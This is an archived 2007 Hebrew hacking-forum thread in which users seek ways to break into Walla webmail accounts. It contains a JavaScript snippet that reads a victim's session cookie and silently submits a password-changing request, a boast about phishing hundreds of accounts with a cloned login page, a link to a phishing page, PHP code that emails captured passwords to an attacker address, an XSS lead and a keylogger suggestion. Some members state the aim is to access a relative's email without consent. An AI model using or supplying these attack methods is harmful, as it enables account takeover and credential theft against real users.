ארכיון רד-בורד: פריצה לדואר של וואלה !

30/09/2007 19:15:07 k_rapper

כיום האיימל של וואלה הוא בין המבוקשים לפריצה
מלא אנשים מחפשים מדריכים לפרוץ אליו
ומכיוון ורוב המדריכים שעובדים על שאר האימלים לא תקפים
לגביו חשבתי שבעזרת הנדסת תוכנה קטנה וקצת פישינג
יהיה אפשר לעשות פישינג לקטע של ההתחברות
בדיוק כמו שעשו פה לדברים אחרים :
http://security.kcsnet.net/shlomix/plus/Phishing/Phishing.html

ואז לרק לשנות את האיימל ולשלוח ולקבל את הסיסמא והשם משתמש של הבן אדם ...

אז ניסיתי עכשיו בחפיף לא הלך לי תכף אני ישב רציני ינסה שוב
כל מי שיכול לעזור ומעוניין לעשות איזה דף פישינג קטן
מוזמן לעלות לאתר ולשתף את כולם

שיהיה ערב טוב חברים

30/09/2007 22:19:42 SkOd

עזוב אותך פישינג. אפשר לפרוץ אימלים בוואלה
פשוט תמשיך לעבוד על זה.

30/09/2007 22:29:03 k_rapper

איך ??
יש לך רעיון אחי חוץ מברוט פורס
שוט ! אני מקשיב ...

30/09/2007 22:31:54 k_rapper

שימו לב זה קטע מתוך אחד המאמרים של קבוצת האקינג ikp
בנושא האיימל של וואלה :
קוד:<html>
<script>
var last = document.cookie

var counter = ""
for (var i = 0; i < last.length; i++)
if (last.charAt(i) == "n")
if (last.charAt(i+1) == "i")
if (last.charAt(i+2) == "c")
if (last.charAt(i+3) == "k")
if (last.charAt(i+4) == "="){ j=i+5;
while (last.charAt(j+1) > "%"){
counter = counter + last.charAt(j)
j = j+1}}

for (var i=1 ; i<2 ;i++){
document.write("<iframe style=’position:absolute;visibility:hidden;’ src=http://friends.walla.co.il/ts.cgi?
tsscript=reg.commit&l=&status=1&edit=1&ReturnURL=http%3A%2F%2Fmail.walla.co.il
&username=",counter,"&password=oooo&passwordv=oooo&
hintq=question&hint=tanswer&DD=11&MM=1&YYYY=1999&email=aaa@mail.boo.il&
pharea=123&phnum=123456&fname=name&lname=fam&gender=2&cityname=scxzc&areacode=0&
vcard=&keywords=&homepage=&surffrom=0&occupation=0&education=0></iframe>")
}
setTimeout(’top.location.href="http://www.walla.co.il/?w=/friends/logout"’, 3000)
</script>
</html>

וניסיתי את זה זה לא עובד יש למישהו רעיון איך אפשר לערוך את זה ככה שזה יעבוד ??

ערכתי את השורה המעצבנת..

[ההודעה נערכה על-ידי devil kide ב-01/10/2007 20:55:15][ההודעה נערכה על-ידי devil kide ב-01/10/2007 20:55:43]

01/10/2007 11:55:05 antivirus

א: שמישהו יתקן את הבאג ויעשה פה גלישת שורות כדי שהעמוד לא יראה ככה

ב: פעם פרצתי בעזרת הנדסת אנוש ל300 אימיילים בוואלה איך? ככה!

יצרתי עמוד שרוב העבודה עליו (כמה ימים) הייתה בשביל הקוסמטיקה שלו שיראה בול של וואלה כל הקישורים בעמוד עבדו לוואלה כל הדברים הכי קטנים היו זהים קופי לוואלה
ואת העמוד הזה הכנסתי להודעת דוא"ל
והודעתי לכולם שהייתה נפילה בשרתים ויש פריצות וכל המשתמשים חייבים לשלוח פרטי התחברות לאתר וואלה כי רק ככה אפשר לאמת שהכתובת אמיתית ולא הדואר ימחק ותתפלאו אבל מאות אנשים שלחו לי את פרטי ההתחברות שלהם עכשיו מה שמצחיק זה שכבר עבר יובל מאז שעשיתי את זה ועד היום זה עובר ברשימות תפוצה של אנשים ואני מקבל עוד ועוד פרטי התחברות חחח

01/10/2007 12:24:42 T4uSBaZ

שמישו יתקן פה ת’גלישת שורות סעמק..
[ההודעה נערכה על-ידי T4uSBaZ ב-01/10/2007 12:26:22]

01/10/2007 12:24:44 Rx3vL0n

לול אנשים הם הנקודה הכי חלשה באבטחת מידע

01/10/2007 19:20:20 k_rapper

antivirus אחי כבר יצרתי את כל הפישיניג זה לא היה קשה כולה צריך להוריד את הקוד מקור לשמור את זה עם התמונות ולהעלות לשרת החלק שאני לא מבין זה איפה בקוד מקור אני צריך לשנות ככה שברגע שהם ישימו את השם משתמש והסיסמא וילחצו על יתחבר זה ישלח לי לאיימל את השם משתמש והסיסמא שלהם ...

01/10/2007 19:28:46 k_rapper

הנה הדף פישינג שבניתי העלתי אותו סתם לנענע להמחשה אל תתייחסו לכתובת הלא הגיונית אני ישנה שרת ברגע שאני רק ידע איפה לשנות בקוד מקור כדי שזה ישלח לי לאיימל את השם משתמש והסיסמא
תראו את זה :
http://www.planetnana.co.il/rapper2008/friends.walla.co.il.htm

01/10/2007 19:30:53 k_rapper

אהה שכחתי להגיד שאם אתם לא רואים טוב את הכתב תשנו את הקידוד
לעיברית iso -logical

01/10/2007 21:01:32 devil kide

מכיוון ש HTML לא יכול לשלוח אימיילים-תחפש את המידע שנשלח (השורה של השם משתמש והסיסמא) ותשךח אותם לדף אחר, באותו הדף תכתוב קוד בשפת צד שרת שישמור את המידע שנשלח...
למשל
קוד:<?Php
$msg="Password:".$_POST[’pass’];
$mag.="email".$_POST[’mail’];
$msg="\n\r";
mail ($msg,"Walla Password","YourMail@server.com");
שגיאה בכניסה לאתר, נסה להתחבר שוב
?>

שישלח את לך אימייל עם שם משתמש וסיסמא...
כל מי שבא בטענות:שטלתי כמה טעויות בכוונה!

01/10/2007 22:41:17 k_rapper

תודה אחי אני ינסה לחפש איפה
זה ולעשות את זה

01/10/2007 23:43:09 ShaDoW MaN

פריצה לאימייל של וואלה לא כלכך מועיל..
אולי פה ושם לראות אימיילים של אנשים מכובדים..

02/10/2007 01:38:48 k_rapper

אחי לי זה מועיל זה משהו ספיציפי אני צריך להיכנס לאיימל של אבא שלי
בעניין משפחתי דחוף ולבדוק כמה דברים
devil kid אני לחוץ בזמן ואני לא ממש מבין אתה יכול לעזור לי ולערוך את מה שרשמת ככה שזה יהיה טוב ולהסביר לי איפה לשים את זה בבקשה אני חייב את זה !

02/10/2007 12:45:23 devil kide

אם זה המייל של אבא שלך זה יותר קל, בהנחה שהוא נכנס מהמחשב שאתה משתמש בו.

02/10/2007 13:06:20 SkOd

יש לך פה XSS שאתה יכול לנצל
קוד:http://search.walla.co.il/?t=xss
תנסה להכניס שם התחברות

02/10/2007 16:00:02 k_rapper

לא הוא נכנס ממחשב בעבודה

02/10/2007 18:05:42 koler

מה עם לבנות קיילוגר חמוד?

02/10/2007 18:48:53 k_rapper

את ה xss אני ינסה לגבי קיילוגר
אין לי שמץ בזה ולכן בלי עזרה אין לי מה להתעסק בזה ...

רד-בורד: ארכיון

ראשי > אבטחת מידע > פריצה לדואר של וואלה !